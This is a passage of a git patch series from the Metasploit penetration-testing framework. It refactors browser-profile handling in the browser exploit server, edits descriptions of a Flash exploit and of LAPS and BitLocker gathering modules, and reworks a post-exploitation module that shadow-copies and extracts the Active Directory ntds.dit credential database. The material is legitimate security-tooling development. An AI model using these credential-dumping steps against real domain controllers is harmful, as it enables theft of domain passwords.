+    def clear_browser_profiles
+      framework[:browser_profiles] ||= {}
+      framework[:browser_profiles].delete(browser_profile_prefix)
     end
 
   end
diff --git a/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb b/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
deleted file mode 100644
index c048fd0ef9..0000000000
--- a/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
+++ /dev/null
@@ -1,158 +0,0 @@
-require 'spec_helper'
-require 'msf/core'
-
-describe Msf::Exploit::Remote::BrowserProfileManager do
-
-
-  def mock_report_note(args)
-    # args example:
-    # {:type=>"blLGFIlwYrxfvcY.new_tag", :data=>"\x81\xB7blLGFIlwYrxfvcY.new_tag\x80", :update=>:unique}
-    @notes.each do |note|
-      if note.ntype == args[:type]
-        allow(note).to receive(:data).and_return(args[:data])
-        return
-      end
-    end
-
-    # No profile found
-    note = create_fake_note(args[:type], args[:data])
-    @notes << note
-  end
-
-  def create_fake_note(tag, data)
-    note = double('note')
-    allow(note).to receive(:ntype).and_return(tag)
-    allow(note).to receive(:data).and_return(data)
-
-    note
-  end
-
-  # When unpacked, this gives us:
-  # {
-  #   "BAP.1433806920.Client.blLGFIlwYrxfvcY" => {
-  #     "source"      => "script",
-  #     "os_name"     => "Windows 8.1",
-  #     "os_vendor"   => "undefined",
-  #     "os_device"   => "undefined",
-  #     "ua_name"     => "Firefox",
-  #     "ua_ver"      => "35.0",
-  #     "arch"        => "x86",
-  #     "java"        => "1.7",
-  #     "silverlight" => "false",
-  #     "flash"       => "14.0",
-  #     "vuln_test"   => "true",
-  #     "proxy"       => false,
-  #     "language"    => "en-US,en;q=0.5",
-  #     "tried"       => true
-  # }}
-  let(:profile_packed_data) do
-    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8E\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3"
-  end
-
-  let(:profile_tag) do
-    MessagePack.unpack(profile_packed_data).keys.first.split('.')[3]
-  end
-
-  let(:note_type_prefix) do
-    MessagePack.unpack(profile_packed_data).keys.first.split('.')[0,3] * "."
-  end
-
-  subject do
-    mod = Msf::Exploit::Remote.allocate
-    mod.extend Msf::Exploit::Remote::BrowserExploitServer
-    mod.extend described_class
-    mod.send(:initialize)
-    mod.send(:datastore=, {'NoteTypePrefix' => note_type_prefix})
-    mod
-  end
-
-  let(:framework) do
-    framework = double('Msf::Framework', datastore: {})
-
-    notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", profile_packed_data)]
-    @notes = notes
-
-    db = double('db')
-    allow(db).to receive(:report_note).with(kind_of(Hash)) { |arg| mock_report_note(arg) }
-    allow(db).to receive(:notes).and_return(notes)
-    allow(framework).to receive(:db).and_return(db)
-
-    framework
-  end
-
-  before(:each) do
-    allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
-  end
-
-  describe '#note_type_prefix' do
-    context  'when note_type_prefix is used' do
-      it 'raises a NoMethodError exception' do
-        expect(subject.note_type_prefix).to eq(note_type_prefix)
-      end
-    end
-  end
-
-  describe '#get_profile_info' do
-
-    let(:found_profile) do
-    end
-
-    context 'when profile is found' do
-      it 'returns a hash with the profile' do
-        found_profile = subject.get_profile_info(profile_tag)
-        found_profile_key = found_profile.keys.first
-        found_profile_data = found_profile[found_profile_key]
-        profile_data = MessagePack.unpack(profile_packed_data).values.first
-        expect(found_profile).to be_kind_of(Hash)
-        expect(found_profile_data).to eq(profile_data)
-      end
-    end
-
-    context 'when a profile is not found' do
-      it 'returns an empty hash' do
-        bad_profile_tag = 'bad_profile_tag'
-        found_profile = subject.get_profile_info(bad_profile_tag)
-        expect(found_profile).to be_kind_of(Hash)
-        expect(found_profile).to be_empty
-      end
-    end
-  end
-
-  describe '#update_profile' do
-
-    let(:key_to_update) { 'os_name' }
-
-    let(:os_value) { 'Windows 7' }
-
-    context 'when no profile is on the database' do
-      let(:new_profile_tag) { 'new_tag' }
-      it 'creates a new profile' do
-      end
-
-      it 'updates data to the new profile' do
-        subject.update_profile(new_profile_tag, key_to_update, os_value)
-        expect(subject.get_profile_info(new_profile_tag).keys.first).to eq("#{note_type_prefix}.#{new_profile_tag}")
-        expect(subject.get_profile_info(new_profile_tag).values.first).to eq({key_to_update => os_value})
-      end
-    end
-
-    context 'when the profile is found on the database' do
-      it 'updates the profile' do
-        expect(subject.get_profile_info(profile_tag).values.first[key_to_update]).to eq('Windows 8.1')
-        subject.update_profile(profile_tag, key_to_update, os_value)
-        expect(subject.get_profile_info(profile_tag).values.first[key_to_update]).to eq(os_value)
-      end
-    end
-  end
-
-  describe '#init_profile' do
-    context 'creates a tag is provided' do
-      it 'creates a new profile' do
-        expect(@notes.length).to eq(1)
-        subject.init_profile('new')
-        expect(@notes.length).to eq(2)
-      end
-    end
-  end
-
-end
\ No newline at end of file

From 0e7f61083673bf7f20be9be77d5e31a79db6f8ab Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 12:58:21 -0500
Subject: [PATCH 0634/1013] Finish browser profile rework in BES

---
 .../exploit/remote/browser_exploit_server.rb  | 23 ++++++-------------
 1 file changed, 7 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index bcd08b9426..a1e36041f6 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -111,17 +111,17 @@ module Msf
     end
 
 
-    # Returns a note type that's unique to this browser exploit module.
-    # This overrides the #note_type_prefix method from Msf::Exploit::Remote::BrowserProfileManager.
+    # Returns a prefix that's unique to this browser exploit module.
+    # This overrides the #browser_profile_prefix method from Msf::Exploit::Remote::BrowserProfileManager.
     # There are two way for BES to get this prefix, either:
     # * It comes from a datastore option. It allows BrowserAutoPwn to share the unique prefix with
     #   its child exploits, so that these exploits don't have to gather browser information again.
     # * If the datastore option isn't set, then we assume the user is firing the exploit as a
     #   standalone so we make somthing more unique, so that if there are two instances using the
     #   same exploit, they don't actually share info.
-    def note_type_prefix
-      self.datastore['NoteTypePrefix'] || @unique_prefix ||= lambda {
-        "#{self.shortname}.#{Time.now.to_i}.Client"
+    def browser_profile_prefix
+      self.datastore['BrowserProfilePrefix'] || @unique_prefix ||= lambda {
+        "#{self.shortname}.#{Time.now.to_i}.#{self.module_uuid}"
       }.call
     end
 
@@ -129,17 +129,8 @@ module Msf
     # Cleans up target information owned by the current module.
     def cleanup
       super
-      # Whoever registered NoteTypePrefix should do the cleanup for notes
-      return if self.datastore['NoteTypePrefix']
-
-      return unless framework.db.active
-      ::ActiveRecord::Base.connection_pool.with_connection {
-        framework.db.notes.each do |note|
-          if note.ntype =~ /^#{self.shortname}\.\d+\.Client/
-            note.destroy
-          end
-        end
-      }
+      # Whoever registered BrowserProfilePrefix should do the cleanup
+      clear_browser_profiles unless self.datastore['BrowserProfilePrefix']
     end
 
 

From c0969d44976d5c0ef33a0df60d4553bfc8ee54d0 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 13:45:38 -0500
Subject: [PATCH 0635/1013] Fix module.uuid references

---
 lib/msf/core/exploit/browser_autopwnv2.rb             | 2 +-
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 8ff4e76c5b..6ece1bd36d 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -79,7 +79,7 @@ module Msf
     #
     # @return [String]
     def browser_profile_prefix
-      @browser_profile_prefix ||= "BAP.#{Time.now.to_i}.#{self.module_uuid}"
+      @browser_profile_prefix ||= "BAP.#{Time.now.to_i}.#{self.uuid}"
     end
 
     # Removes background exploit jobs that belong to BAP.
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index a1e36041f6..e5556cbc93 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -121,7 +121,7 @@ module Msf
     #   same exploit, they don't actually share info.
     def browser_profile_prefix
       self.datastore['BrowserProfilePrefix'] || @unique_prefix ||= lambda {
-        "#{self.shortname}.#{Time.now.to_i}.#{self.module_uuid}"
+        "#{self.shortname}.#{Time.now.to_i}.#{self.uuid}"
       }.call
     end
 

From 95f19e6f1fc7c3852989534d5fc3801ace57c970 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 2 Jul 2015 13:49:24 -0500
Subject: [PATCH 0636/1013] Minor description edits for clarity

Edited modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
first landed in #5642, Adobe Flash CVE-2015-3113 Nellymoser Audio
Decoding BOF

Edited modules/post/windows/gather/credentials/enum_laps.rb first landed
in #5590, @Meatballs1 adds MS LAPS Enum post mod

Edited modules/post/windows/gather/enum_ad_bitlocker.rb first landed in
Keys from AD
---
 .../exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 9 +++++++--
 modules/post/windows/gather/credentials/enum_laps.rb     | 6 +++---
 modules/post/windows/gather/enum_ad_bitlocker.rb         | 2 +-
 3 files changed, 11 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
index 9f7824d750..87984767fe 100644
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -20,9 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
-        Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, and
-        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466.
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
+        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
         Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
+
+
+        Note that this exploit is effective against both CVE-2015-3113 and the
+        earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
+        to the same root cause as CVE-2015-3043.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>
diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb
index ccbe8dc996..ef662915c4 100644
--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -22,9 +22,9 @@ class Metasploit3 < Msf::Post
       'Name'         => 'Windows Gather Credentials Local Administrator Password Solution',
       'Description'  => %Q{
         This module will recover the LAPS (Local Administrator Password Solution) passwords,
-        configured in active directory. Note, only privileged users should be able to access
-        these fields. Note: The local administrator account name is not stored in active directory,
-        so we assume that this will be 'Administrator' by default.
+        configured in Active Directory, which is usually only accessable by privileged users.
+        Note that the local administrator account name is not stored in Active Directory,
+        so it is assumed to be 'Administrator' by default.
       },
       'License'      => MSF_LICENSE,
       'Author'       =>
diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index b2aa320180..c72c4981d0 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
       'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
       'Description'  => %q{
         This module will enumerate BitLocker recovery passwords in the default AD
-        directory. Requires Domain Admin or other delegated privileges.
+        directory. This module does require Domain Admin or other delegated privileges.
       },
       'License'      => MSF_LICENSE,
       'Author'       => ['Ben Campbell <ben.campbell[at]mwrinfosecurity.com>'],

From 89d283da0971c55f1f352ba33ad5562d8f7f5c9b Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 2 Jul 2015 14:07:47 -0500
Subject: [PATCH 0637/1013] check registry for ntds location

check the registry for the location of the ntds.dit
file

MSP-12867
---
 .../windows/gather/credentials/domain_hashdump.rb | 15 +++++++++------
 1 file changed, 9 insertions(+), 6 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 968258fb42..f62d3008e7 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Post
       unless ntds_file.nil?
         print_status "Repairing NTDS database after copy..."
         print_status repair_ntds(ntds_file)
-        realm = domain_name
+        realm = sysinfo["Domain"]
         ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
         ntds_parser.each_account do |ad_account|
           print_good ad_account.to_s
@@ -67,13 +67,16 @@ class Metasploit3 < Msf::Post
     database_file_path
   end
 
-  def domain_name
-    result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"')
-    result.gsub!(/Domain:\s+/,'')
+  def is_domain_controller?
+    if ntds_location
+      file_exist?("#{ntds_location}\\ntds.dit")
+    else
+      false
+    end
   end
 
-  def is_domain_controller?
-    file_exist?('%SystemDrive%\Windows\ntds\ntds.dit')
+  def ntds_location
+    @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\","DSA Working Directory")
   end
 
   def ntdsutil_method

From 7bdfcf2bce2c7ae5d594dafb7ce1b513ff4f0ad3 Mon Sep 17 00:00:00 2001
From: darkbushido <lance.sanchez@gmail.com>
Date: Tue, 30 Jun 2015 11:25:46 -0500
Subject: [PATCH 0638/1013] locking the r7 managed gems to specific versions

this will force pro to use the same version of the gems
---
 Gemfile.lock                    | 10 +++++-----
 metasploit-framework-db.gemspec |  4 ++--
 metasploit-framework.gemspec    |  6 +++---
 3 files changed, 10 insertions(+), 10 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 29efb30d4f..4d140dec18 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -7,24 +7,24 @@ PATH
       bcrypt
       jsobfu (~> 0.2.0)
       json
-      metasploit-concern (~> 1.0)
-      metasploit-model (~> 1.0)
+      metasploit-concern (= 1.0.0)
+      metasploit-model (= 1.0.0)
       metasploit-payloads (= 1.0.4)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
       railties
       rb-readline-r7
-      recog (~> 2.0)
+      recog (= 2.0.6)
       robots
       rubyzip (~> 1.1)
       sqlite3
       tzinfo
     metasploit-framework-db (4.11.0.pre.dev)
       activerecord (>= 4.0.9, < 4.1.0)
-      metasploit-credential (~> 1.0)
+      metasploit-credential (= 1.0.0)
       metasploit-framework (= 4.11.0.pre.dev)
-      metasploit_data_models (~> 1.2)
+      metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
     metasploit-framework-pcap (4.11.0.pre.dev)
       metasploit-framework (= 4.11.0.pre.dev)
diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec
index d64792775f..7f5211f076 100644
--- a/metasploit-framework-db.gemspec
+++ b/metasploit-framework-db.gemspec
@@ -29,9 +29,9 @@ Gem::Specification.new do |spec|
 
   spec.add_runtime_dependency 'activerecord', *Metasploit::Framework::RailsVersionConstraint::RAILS_VERSION
   # Metasploit::Credential database models
-  spec.add_runtime_dependency 'metasploit-credential', '~> 1.0'
+  spec.add_runtime_dependency 'metasploit-credential', '1.0.0'
   # Database models shared between framework and Pro.
-  spec.add_runtime_dependency 'metasploit_data_models', '~> 1.2'
+  spec.add_runtime_dependency 'metasploit_data_models', '1.2.5'
   # depend on metasploit-framewrok as the optional gems are useless with the actual code
   spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
   # Needed for module caching in Mdm::ModuleDetails
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 244711be98..a9808136ab 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -57,10 +57,10 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks
-  spec.add_runtime_dependency 'metasploit-concern', '~> 1.0'
+  spec.add_runtime_dependency 'metasploit-concern', '1.0.0'
   # Things that would normally be part of the database model, but which
   # are needed when there's no database
-  spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
+  spec.add_runtime_dependency 'metasploit-model', '1.0.0'
   # Needed for Meterpreter
   spec.add_runtime_dependency 'metasploit-payloads', '1.0.4'
   # Needed by msfgui and other rpc components
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
   # Run initializers for metasploit-concern, metasploit-credential, metasploit_data_models Rails::Engines
   spec.add_runtime_dependency 'railties'
   # required for OS fingerprinting
-  spec.add_runtime_dependency 'recog', '~> 2.0'
+  spec.add_runtime_dependency 'recog', '2.0.6'
 
   # rb-readline doesn't work with Ruby Installer due to error with Fiddle:
   #   NoMethodError undefined method `dlopen' for Fiddle:Module

From cc51d1e8fda9387e92ad47098202d9a91b50bf9d Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 2 Jul 2015 14:27:51 -0500
Subject: [PATCH 0639/1013] use registry data for VSS grab

use the location data we got from the registry for copying
the NTDS.dit file correctly with the VSS method
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index f62d3008e7..8661a50669 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -141,10 +141,12 @@ class Metasploit3 < Msf::Post
   end
 
   def vss_method
-    id = create_shadowcopy("#{get_env("%SystemDrive%")}\\")
+    location = ntds_location.dup
+    volume = location.slice!(0,3)
+    id = create_shadowcopy("#{volume}\\")
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
-    sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
+    sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"
     target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)

From 8892cbdd102870a9857687662a6f794b6fdf994a Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 2 Jul 2015 14:32:16 -0500
Subject: [PATCH 0640/1013] Fix some minor things

---
 modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 1 -
 modules/post/windows/gather/credentials/enum_laps.rb         | 2 +-
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
index 87984767fe..dcb5f9346a 100644
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
         Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
         Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
 
-
         Note that this exploit is effective against both CVE-2015-3113 and the
         earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
         to the same root cause as CVE-2015-3043.
diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb
index ef662915c4..32727cbd1e 100644
--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
       'Name'         => 'Windows Gather Credentials Local Administrator Password Solution',
       'Description'  => %Q{
         This module will recover the LAPS (Local Administrator Password Solution) passwords,
-        configured in Active Directory, which is usually only accessable by privileged users.
+        configured in Active Directory, which is usually only accessible by privileged users.
         Note that the local administrator account name is not stored in Active Directory,
         so it is assumed to be 'Administrator' by default.
       },

From 7b2b526ea1367e4a900e3ee3c7648761770e6404 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 2 Jul 2015 14:33:21 -0500
Subject: [PATCH 0641/1013] deregister unwated options

deregister mixin options that we don't need
for this module
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 8661a50669..6e215e80e1 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Post
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ]
   ))
+    deregister_options('RHOST','SMBUser','SMBPass', 'SMBDomain')
   end
 
   def run

From e843db78dc7f653c8e1d30a01a4cb855bbd0e11e Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 2 Jul 2015 14:46:40 -0500
Subject: [PATCH 0642/1013] put rhost option back

it is needed for the wmic query that
creates the shadowcopy

MSP-12867
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 6e215e80e1..a90b6d3ac1 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ]
   ))
-    deregister_options('RHOST','SMBUser','SMBPass', 'SMBDomain')
+    deregister_options('SMBUser','SMBPass', 'SMBDomain')
   end
 
   def run
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Post
   def vss_method
     location = ntds_location.dup
     volume = location.slice!(0,3)
-    id = create_shadowcopy("#{volume}\\")
+    id = create_shadowcopy("#{volume}")
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"

From c5c7de00918289591e0fbfdcc0320e01205c1b29 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 14:58:43 -0500
Subject: [PATCH 0643/1013] Rework browser profiles,  get back to functional
 mode

---
 .../exploit/remote/browser_exploit_server.rb  | 48 ++++++++++---------
 .../exploit/remote/browser_profile_manager.rb |  8 ++--
 lib/msf/core/framework.rb                     |  8 ++++
 3 files changed, 36 insertions(+), 28 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index e5556cbc93..0f4dfc8025 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -179,7 +179,7 @@ module Msf
     def extract_requirements(reqs)
       tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_s)}
       # Make sure keys are always symbols
-      Hash[tmp.map{|(k,v)| [k.to_s,v]}]
+      Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
     end
 
 
@@ -191,8 +191,6 @@ module Msf
     def try_set_target(profile)
       match_counts        = []
       target_requirements = {}
-      profile = profile.values.first
-
       targets.each do |t|
         target_requirements = extract_requirements(t.opts)
         if target_requirements.blank?
@@ -223,7 +221,7 @@ module Msf
     #                    "{CLSID}=>Method=>Boolean;"
     # @return [Boolean] True if there's a bad ActiveX, otherwise false
     def has_bad_activex?(ax)
-      ax.split(';').each do |a|
+      ax.to_s.split(';').each do |a|
         bool = a.split('=>')[2]
         if bool == 'false'
           return true
@@ -238,24 +236,23 @@ module Msf
     # @param profile [Hash] The profile to check
     # @return [Array] An array of requirements not met
     def get_bad_requirements(profile)
-      profile = profile.first[1]
       bad_reqs = []
-
-      @requirements.each do |k, v|
+      @requirements.each do |rk, v|
+        k = rk.to_sym
         expected = k != :vuln_test ? v : 'true'
 
-        vprint_status("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_s]}")
+        vprint_status("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k]}")
 
         if k == :activex
-          bad_reqs << k if has_bad_activex?(profile[k.to_s])
+          bad_reqs << k if has_bad_activex?(profile[k])
         elsif k == :vuln_test
-          bad_reqs << k unless profile[k.to_s].to_s == 'true'
+          bad_reqs << k unless profile[k].to_s == 'true'
         elsif v.is_a? Regexp
-          bad_reqs << k if profile[k.to_s] !~ v
+          bad_reqs << k if profile[k] !~ v
         elsif v.is_a? Proc
-          bad_reqs << k unless v.call(profile[k.to_s])
+          bad_reqs << k unless v.call(profile[k])
         else
-          bad_reqs << k if profile[k.to_s] != v
+          bad_reqs << k if profile[k] != v
         end
       end
 
@@ -297,7 +294,8 @@ module Msf
       tag = retrieve_tag(cli, request)
 
       browser_profile[tag] ||= {}
-      browser_profile[tag][:source] = source.to_s
+      profile = browser_profile[tag]
+      profile[:source] = source.to_s
 
       found_ua_name = ''
       found_ua_ver  = ''
@@ -309,7 +307,7 @@ module Msf
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
         vprint_status("Received sniffed browser data over POST:")
         vprint_line("#{parsed_body}.")
-        parsed_body.each { |k, v| browser_profile[tag][k.to_s] = v.first }
+        parsed_body.each { |k, v| profile[k.to_sym] = v.first }
         found_ua_name = parsed_body['ua_name']
         found_ua_ver = parsed_body['ua_ver']
 
@@ -321,15 +319,20 @@ module Msf
         # Kill this to save space.
         fp.delete(:ua_string)
         fp.each do |k, v|
-          browser_profile[tag][k.to_s] = v
+          profile[k.to_sym] = v
         end
         found_ua_name = fp[:ua_name]
         found_ua_ver = fp[:ua_ver]
       end
 
       # Other detections
-      browser_profile[tag][:proxy] = has_proxy?(request)
-      browser_profile[tag][:language] = request.headers['Accept-Language'] || ''
+      profile[:proxy]    = has_proxy?(request)
+      profile[:language] = request.headers['Accept-Language'] || ''
+
+      # Basic tracking
+      profile[:address]    = cli.peerhost
+      profile[:module]     = self.fullname
+      profile[:created_at] = Time.now
 
       report_client({
         :host      => cli.peerhost,
@@ -459,7 +462,7 @@ module Msf
         #
         # This is the information gathering stage
         #
-        unless browser_profile[retrieve_tag(cli, request)].empty?
+        if browser_profile[retrieve_tag(cli, request)]
           send_redirect(cli, get_module_resource)
           return
         end
@@ -495,20 +498,19 @@ module Msf
         tag = retrieve_tag(cli, request)
         vprint_status("Serving exploit to user with tag #{tag}")
         profile = browser_profile[tag]
-        if profile.empty?
+        if profile.nil?
           print_status("Browsing directly to the exploit URL is forbidden.")
           send_not_found(cli)
         elsif profile[:tried] and datastore['Retries'] == false
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
           send_not_found(cli)
         else
-          profile[tag][:tried] = true
+          profile[:tried] = true
           vprint_status("Setting target \"#{tag}\" to :tried.")
           try_set_target(profile)
           bad_reqs = get_bad_requirements(profile)
           if bad_reqs.empty?
-            browser_info = profile.values.first
-            browser_info = browser_info.inject({}){|data,(k,v)| data[k.to_sym] = v; data}
+              browser_info = profile.dup
             begin
               method(:on_request_exploit).call(cli, request, browser_info)
             rescue BESException => e
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index 08dd8d2d6a..23bf1fbe06 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -11,16 +11,14 @@ module Msf
     #
     # @return [Hash]
     def browser_profile
-      framework[:browser_profiles] ||= {}
-      framework[:browser_profiles][browser_profile_prefix] ||= {}
-      framework[:browser_profiles][browser_profile_prefix]
+      framework.browser_profiles[browser_profile_prefix] ||= {}
+      framework.browser_profiles[browser_profile_prefix]
     end
 
     # Storage backend for browser profiles
     #
     def clear_browser_profiles
-      framework[:browser_profiles] ||= {}
-      framework[:browser_profiles].delete(browser_profile_prefix)
+      framework.browser_profiles.delete(browser_profile_prefix)
     end
 
   end
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index fe54145d0d..a03932cb58 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -92,6 +92,7 @@ class Framework
     self.jobs      = Rex::JobContainer.new
     self.plugins   = PluginManager.new(self)
     self.uuid_db   = Rex::JSONHashFile.new(::File.join(Msf::Config.config_directory, "payloads.json"))
+    self.browser_profiles = Hash.new
 
     # Configure the thread factory
